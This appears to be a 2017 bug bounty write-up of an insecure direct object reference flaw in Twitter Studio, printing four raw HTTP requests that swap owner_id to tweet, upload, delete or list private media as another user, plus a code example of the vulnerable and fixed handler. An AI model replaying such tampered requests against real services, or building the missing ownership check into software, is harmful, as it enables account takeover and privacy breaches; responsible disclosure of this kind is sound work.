May 28, 2017 - 2:38 p.m.

How I took control of your Twitter account (tweeting, viewing/deleting photos and other media)

Anand Prakash ([email protected])
www.anandpraka.sh

Summary:

This blog post is about an insecure direct object reference (IDOR) vulnerability on Twitter which could have been used by attackers to tweet from other accounts, upload videos on behalf of users, delete pics/videos from a victim's tweets, view private media uploaded by other Twitter accounts, etc. All endpoints on studio.twitter.com were vulnerable.

Description:

Twitter is an online news and social networking service where users post and interact with messages, “tweets”, restricted to 140 characters. Registered users can post tweets, but those who are unregistered can only read them. Users access Twitter through its website interface, SMS or a mobile device app.

Twitter had launched a new product named Twitter Studio (studio.twitter.com) in September 2016. So I started looking out for security loopholes after the launch. All API requests on studio.twitter.com were sending a parameter named "owner_id", which was the Twitter user id (publicly available and sequential) of the logged-in user. The owner_id parameter was missing authorisation checks; changing it allowed me to take actions on behalf of other Twitter users.

Vulnerable request #1 (Tweeting from other Twitter accounts)

POST /1/tweet.json HTTP/1.1
Host: studio.twitter.com

{"account_id":"attacker's account id","owner_id":"victim's user id","metadata":{"monetize":false,"embeddable_playback":false,"title":"Test tweet by attacker","description":"attacker attacker","cta_type":null,"cta_link":null},"media_key":"","text":"attacker attacker"}

Replaying the above request with the victim's id resulted in a tweet from the victim's account.

Vulnerable request #2 (Upload media from another user's account)

POST /1/library/add.json HTTP/1.1
Host: studio.twitter.com

{"account_id":"attacker's account id","owner_id":"victim's id","metadata":{"monetize":false,"name":"abcd.png","embeddable_playback":true,"title":"Attacker","description":"","cta_type":null,"cta_link":null},"media_id":"","managed":false,"media_type":"TweetImage"}

Replaying the above request with the victim's owner_id uploaded media from another user's account.

Vulnerable request #3 (Delete Videos of other accounts)

POST /1/library/remove.json HTTP/1.1
Host: studio.twitter.com

{"account_id":"attacker's account id","owner_id":"victim's id","media_key":"victim's video id"}

Replaying the above request with the victim's user id and the victim's media_key deleted media from the victim's account.

Vulnerable request #4 (Private media disclosure)

GET /1/library/list.json?account_id=attacker's account id&owner_id=victim's id&limit=20&offset=0 HTTP/1.1
Host: studio.twitter.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://studio.twitter.com/library
Cookie:
Connection: keep-alive

Replaying the above request with the victim's user id and my account id leaked all private media of the victim's Twitter account in the response.
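The root cause shared by the four requests above, as an added example that is not from this post or from Twitter: a minimal in-memory media library with the vulnerable list handler beside its fixed form, where the client-supplied owner_id must match the user the session authenticated and media_key must belong to that owner. Class and function names and the sample data are assumptions.

```python
# Added example, not Twitter's code: the missing owner_id check behind the
# Studio requests, modelled on a tiny in-memory media-library service.
# Class, function and field names are assumptions made for illustration.
from dataclasses import dataclass, field


class Forbidden(Exception):
    """The authenticated user may not act on the referenced owner or object."""


@dataclass
class MediaLibrary:
    # owner_id -> set of media_keys (constructed sample data, see demo())
    items: dict = field(default_factory=dict)

    def list_vulnerable(self, session_user: str, params: dict) -> list:
        # BUG: the object reference (owner_id) is taken from the request and
        # never compared with the user the session cookie authenticated.
        return sorted(self.items.get(params["owner_id"], set()))

    def _authorize(self, session_user: str, owner_id: str) -> None:
        # The reference supplied by the client must match the principal the
        # server already knows from the session; a mismatch is an IDOR attempt.
        if owner_id != session_user:
            raise Forbidden(f"user {session_user} is not owner {owner_id}")

    def list_fixed(self, session_user: str, params: dict) -> list:
        self._authorize(session_user, params["owner_id"])
        return sorted(self.items.get(params["owner_id"], set()))

    def remove_fixed(self, session_user: str, params: dict) -> bool:
        # Two checks: the owner matches the session, and the media_key really
        # belongs to that owner, so a valid owner_id cannot delete others' media.
        owner_id, media_key = params["owner_id"], params["media_key"]
        self._authorize(session_user, owner_id)
        owned = self.items.get(owner_id, set())
        if media_key not in owned:
            raise Forbidden(f"media {media_key} does not belong to {owner_id}")
        owned.discard(media_key)
        return True


def demo() -> dict:
    # Constructed data: two users (ids are made up), each with private media.
    lib = MediaLibrary({"1001": {"m-a1", "m-a2"}, "2002": {"m-v1"}})
    attacker, victim = "1001", "2002"
    leaked = lib.list_vulnerable(attacker, {"owner_id": victim})
    try:
        lib.list_fixed(attacker, {"owner_id": victim})
        blocked = False
    except Forbidden:
        blocked = True
    return {"leaked": leaked, "blocked": blocked}
```

Deriving the owner from the session and ignoring the client-supplied owner_id altogether is the simpler fix when the API does not need to act on behalf of several owners.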

Video Proof of concept:

All tests were done on a friend's account after taking permission. In the videos I am using my session cookies to tweet from another person's account (Sunil Bhati).

#1 Tweet from victim’s account, Private media leakage

#2 Delete media from victim’s tweets

Timeline:

29th August - Reported all findings to Twitter in 3 different reports as the endpoints were different.

2nd September - Received a response from the Twitter team saying they were looking into the issue and would be closing out the other reports as duplicates, as they share the same root cause, i.e. the missing owner_id check.
3rd September - Bounty of $5,040 rewarded by Twitter.
3rd September - Pinged them to check if the report falls under the "Core Twitter" category for bounty as it impacted Twitter.com. No response from them.